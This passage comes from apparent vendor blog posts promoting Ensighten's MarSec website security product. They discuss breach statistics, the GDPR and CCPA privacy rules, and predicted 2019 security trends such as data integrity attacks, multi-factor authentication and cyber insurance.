The number of organizations under attack from cybercrime is also on the rise. The same report shows that most organizations have experienced some type of attack within the course of a year, with only seven percent claiming not to have experienced an attack at all. Those who reported the highest damage are from retail and high-tech sectors.
Data leakage and information loss remain the biggest concern to more than a third of businesses, followed by service outages
Application-layer attacks cause considerable damage; two-thirds of firms experienced application-layer DoS attacks and 34 percent foresee application vulnerabilities being a major concern in the coming year
More than half reported making changes and updates to their public-facing applications monthly, while the rest made updates more frequently, driving the need for automated security
Website security checks: a necessity
In light of the heightened risks associated with a data breach, consistently monitoring the security of your website is a must. However, it can be difficult to track and manage all your third-party technologies, plus any other technologies that piggy-back on them.
This is where you need a website security solution like our MarSec platform, which enables you to feel confident in your website security posture, while having the flexibility to run your business.
The website security solution also addresses client-side vulnerabilities by extending protection beyond your company network to the visitor’s browser, where your third-party scripts actually execute.
With high-profile cyberattacks an increasingly common occurrence, it pays to be proactive in your approach to website security checks, because as we’ve seen, the fallout from a data breach can have catastrophic implications for your business.
What GDPR, CCPA and a heightened focus on data regulation worldwide means for businesses
2018 was a landmark year for data privacy.
Some of the biggest companies in the world fell victim to data breaches, compromising the personal information of millions of people worldwide. Whether through sophisticated cyberattacks, software glitches or the simple mishandling of customer data, the likes of T-Mobile, Quora and Google were among the big names forced to admit they suffered breaches.
Some were repeat victims (or offenders, depending on how you look at it) of data breaches. Facebook suffered several major breaches and incidents that affected more than 100 million of its users in 2018.
It is therefore little wonder that US consumers are increasingly concerned about how their personally identifiable information (PII) is handled. One report by SAS shows that almost three-quarters (73 percent) of consumers said their concern over the privacy of their personal data has increased in the past few years, while another report puts the figure even higher, with almost 88 percent of US consumers harbouring concerns when it comes to the privacy of their PII data online in 2019.
GDPR: a blueprint for the US and the CCPA?
2018 was not only a milestone year in terms of the frequency and scale of cyberattacks; the General Data Protection Regulation (GDPR) came into force across the European Union (EU) in May 2018, not only to help regulate against such occurrences, but to put power back into consumers’ hands when it comes to data privacy.
Now in 2019 the US is set to follow suit. This has started at individual state level with the California Consumer Privacy Act (CCPA), which takes effect in January 2020. The act is designed to give California residents access to any personal information being collected about them, to let them find out whether their PII is sold or disclosed and to whom, and to give them the power to opt out of that sale if they wish.
Elsewhere Vermont has become the first state to enact a law regulating data brokers who buy and sell personal information.
Moves to ensure consumer data privacy rights are also being taken up at federal level, with the US Senate holding its first committee hearing in September to examine how lawmakers can protect consumer privacy. Further, in early November the Consumer Data Privacy Act was proposed, a bill that emulates GDPR and would penalize CEOs in addition to their companies.
The incoming regulations reflect increasing demand from US consumers for greater data privacy rights. According to SAS:
83 percent would like the right to tell an organization not to share or sell their personal information
80 percent also want to know where and to whom their data is being sold
73 percent said they would like the right to ask an organization how their data is being used
64 percent would like the right to have their data deleted or erased
GDPR compliance – ignoring it is risky business
Crucially, another recent global survey shows that more than two-thirds of consumers would walk away from an organization if it suffered a data breach where their financial and sensitive information was stolen. Ninety-three percent of those questioned say they would place the blame at the door of the business and would think about acting against them, with retailers, banks and social media sites considered the most ‘at-risk’ offenders when it comes to data breaches and failure to uphold GDPR compliance.
The loss of business and the severity of the fines now imposed on organizations following a data leak, alongside the long-lasting financial and reputational damage, mean that any company that collects or processes user data on its website must take every reasonable precaution to prevent a data breach and take GDPR compliance seriously.
For example, if you use marketing tags, chat boxes or free-form fields to collect data from visitors to your website, it is your responsibility to protect that data from misuse or theft. Even this early in 2019, Singapore Airlines (SIA) has admitted that a software glitch on its website was behind a data breach affecting 285 members of its frequent flyer programme, compromising personal information including passport and flight details.
The good news is that marketing security (MarSec) solutions enable you to manage your customers’ data on your website, help prevent data leakage and support your GDPR compliance efforts, reducing the risk that data collected from your customers is exploited by hackers and cybercriminals.
It doesn’t matter where you are in the world – governments and lawmakers are tightening the net when it comes to data privacy. Speak to Ensighten about how MarSec can help you navigate the new privacy laws and avoid any last-minute scramble to achieve compliance.
In the world of website security, there’s an ever-changing array of threats and technological advancements that come along seemingly every day. One thing’s for sure, the sophistication and scope of attacks will continue to grow, but so will the arsenal of tools webmasters have to defend their website and customer data.
After a year punctuated with high profile data breaches, website security is sure to be an issue at the forefront of every business leader’s mind. But what are some of the most prominent website security trends we expect to see in 2019?
1. The methodology of attackers is changing
In the year ahead, website security experts expect to see a shift in the modus operandi of cybercriminals. Instead of stealing data, as has been done so many times in 2018, attackers will instead threaten to undermine the integrity of the data, with potentially catastrophic effects.
A data integrity attack involves the manipulation of data rather than its theft. In 2016, the World Anti-Doping Agency (WADA) was the victim of this type of attack, when data about famous athletes was not only breached, but it was also manipulated to try and damage the reputations of clean athletes.
The potential damage data integrity attacks can cause is huge. Entire stock markets could be poisoned by manipulated data such as sales figures, which could artificially inflate or deflate the value of a company’s stock. Even infrastructure such as the power grid, traffic lights and the water supply could be at risk.
This type of attack can be particularly damaging because it can have a much longer-term effect on the business. Consumers may no longer trust an organization’s data, which could bring an entire company down. The attacks can also go undetected for years, further increasing the extent of the damage.
2. Multi-factor authentication will become the norm for online transactions
Using only a password to access websites and other online services currently makes life very easy for cybercriminals. Although it may not be welcomed by consumers at first, we expect to see additional or optional authentication factors added to customer logins to boost the security of sites. This provides an extra line of defence against stolen and reused passwords and against the hugely damaging phishing attacks, with one caveat: a phishing site that relays one-time codes to the real site in real time still gets in, so only phishing-resistant factors such as hardware security keys (FIDO2/WebAuthn) fully close that gap.
3. Clearer internal understanding of the responsibility for cybersecurity
One of the biggest problems many businesses currently face is failing to assign and communicate responsibility for protecting their websites and data effectively. In a previous blog, we referenced a study by the Ponemon Institute which found that IT and marketing managers each think that responsibility for customer data security lies with the other party. The result is that many sites are left unsecured and open to a potential data breach. In 2019, in response to the high-profile data breaches of 2018, we expect responsibility to be defined more clearly across departments, so that someone has ultimate ownership of the company’s marketing security.
4. Protecting against smarter AI
One of the big concerns many businesses have for the year ahead is that hackers will start to leverage artificial intelligence (AI) to find new ways to infiltrate websites and apps at scale. We recently discussed this point in an article that was published on TechRadar Pro.
With every type of attack prevented, hackers create new and more sophisticated ways to breach standard defences. The worry is that AI could be the ‘next big thing’ for attackers, allowing them to learn how defence tools respond and bypass even the most advanced security implementations. This is something cybersecurity professionals will have to work hard to counter in 2019 through various measures, including website marketing security.
5. The start of cyber-risk insurance
With cyberattacks costing the global economy an incredible $600bn annually, it’s perhaps little surprise that businesses are looking for new ways to protect themselves against the colossal risks. As a result, we expect to see cyber-risk insurance become an increasingly common part of the operational risk strategies many firms put in place.
At the moment there is a fairly limited range of policies available. However, in 2019 we expect to see more and more cyber-risk policies tailored to the specific risks smaller and medium-sized businesses face. That could include cover for loss of reputation and even loss of future revenues from negative media coverage, although clearly such policies will not come cheap.
Protect your website in 2019
67 percent of businesses are yet to implement marketing security for their website and are putting their customers and their reputations at risk. Ensighten MarSec provides protection against data risks to keep your website customer data secure and safeguarded against data breaches in 2019 and beyond. Get in touch to discuss your requirements or arrange a demo today.